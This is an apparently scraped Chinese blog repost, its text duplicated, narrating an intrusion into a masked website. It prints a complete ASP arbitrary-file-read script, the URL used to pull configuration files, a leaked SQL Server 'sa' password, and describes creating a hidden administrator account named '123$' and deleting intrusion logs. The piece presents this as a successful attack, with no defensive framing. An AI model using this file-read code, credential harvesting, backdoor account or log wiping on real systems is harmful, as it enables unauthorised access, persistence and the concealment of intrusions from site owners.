黑客是如何突破一流检测系统的
程序员文章站
2022-06-28 14:05:58
攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该... 08-10-08...
攻击目标:www.***.com
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 ------------------------------------------------------------------------- <%
file=request("file")
set fsoobj=server.createobject("scripting.filesystemobject")
if fsoobj.fileexists(file) then
set myfile=fsoobj.opentextfile(file,1)
response.write "<pre>" & server.htmlencode(myfile.readall) &"</pre>"
myfile.close
set myfile=nothing
else
response.write "file(" & file & ") not exists."
end if
%>
------------------------------------------------------------------------- http://www.***.com/view.asp?file=d:\wwwroot\index.asp 读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f 利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
测试过的动作,一句话马,加密马,等。
测试结果:无效,无法上传,无法进入系统。
经过2天的分析,
然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码 ------------------------------------------------------------------------- <%
file=request("file")
set fsoobj=server.createobject("scripting.filesystemobject")
if fsoobj.fileexists(file) then
set myfile=fsoobj.opentextfile(file,1)
response.write "<pre>" & server.htmlencode(myfile.readall) &"</pre>"
myfile.close
set myfile=nothing
else
response.write "file(" & file & ") not exists."
end if
%>
------------------------------------------------------------------------- http://www.***.com/view.asp?file=d:\wwwroot\index.asp 读取到的敏感内容
sql地址:***.***.***.***
帐号:sa 密码:u8f2444f 利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
上一篇: 强化远程终端3389入侵
下一篇: 利用SA权限入侵Mssql主机后的感悟